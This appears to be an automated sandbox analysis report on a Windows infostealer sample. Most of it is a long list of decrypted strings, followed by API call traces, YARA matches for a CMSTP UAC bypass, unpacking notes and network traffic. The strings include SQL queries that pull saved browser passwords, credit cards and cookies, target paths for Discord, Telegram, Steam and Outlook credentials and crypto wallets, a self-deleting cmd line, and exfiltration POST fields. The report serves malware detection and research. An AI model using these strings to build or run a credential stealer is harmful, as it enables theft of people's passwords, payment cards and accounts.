Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetDC
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CloseWindow
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: wsprintfA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CharToOemW
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: wsprintfW
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: StrStrA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RmStartSession
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RmGetList
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: RmEndSession
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: encrypted_key
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: PATH
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: NSS_Init
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: browser:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: profile:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: url:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: login:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: password:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Opera
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: OperaGX
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Network
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: cookies
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: .txt
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: TRUE
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: FALSE
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: autofill
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: history
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: name:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: month:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: year:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: card:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Cookies
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Login Data
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Web Data
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: History
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: logins.json
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: usernameField
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: guid
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: places.sqlite
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: plugins
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: IndexedDB
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Opera Stable
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: CURRENT
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Local State
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: profiles.ini
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: chrome
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: opera
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: firefox
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: wallets
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ProductName
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ProcessorNameString
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: DisplayName
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Network Info:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: System Summary:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - HWID:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - OS:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Architecture:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - UserName:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Local Time:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - UTC:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Language:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Laptop:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Running Path:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - CPU:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Threads:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Cores:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - RAM:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: - GPU:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: User Agents:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: All Users:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Current User:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Process List:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: system_info.txt
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: nss3.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \Temp\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: .exe
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: runas
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: open
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: /c start
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: %RECENT%
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: *.lnk
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: files
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \discord\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: key_datas
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: map*
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Telegram
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: *.tox
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: *.ini
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Password
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: 00000001
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: 00000002
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: 00000003
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: 00000004
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Pidgin
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \.purple\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: accounts.xml
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: token:
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: SteamPath
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \config\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ssfn*
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: config.vdf
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \Steam\
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: browsers
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: done
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: soft
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: https
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: POST
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: hwid
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: build
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: token
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: file_name
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: file
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: message
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.2.u5qk.0.exe.5c70e67.1.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	1_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BA66C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	1_2_6BA66C80
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6BBBA9A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBB43B0 PK11_PubEncryptPKCS1,PR_SetError,	1_2_6BBB43B0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BF4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_00BF4280
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BF45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	3_2_00BF45A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 14.2.run.exe.39d686d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.run.exe.3e7ad5b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.run.exe.3a1ad5b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.4c3b976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.4a80e64.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.run.exe.3e7a15b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.run.exe.3a1a15b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.4c7f264.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.4a3c976.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.4c7fe64.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.run.exe.3e3686d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.cmd.exe.4a80264.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 7780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 7612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 3052, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Unpacked PE file: 0.2.VucRf0jboS.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Unpacked PE file: 1.2.u5qk.0.exe.400000.0.unpack

Source: VucRf0jboS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\VucRf0jboS.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 185.93.1.247:443 -> 192.168.2.4:49747 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u5qk.0.exe, 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3024794413.0000020EEB3E0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u5qk.0.exe, 00000001.00000002.2570415319.000000006BC8F000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3021792267.0000020EEAA70000.00000004.08000000.00040000.00000000.sdmp
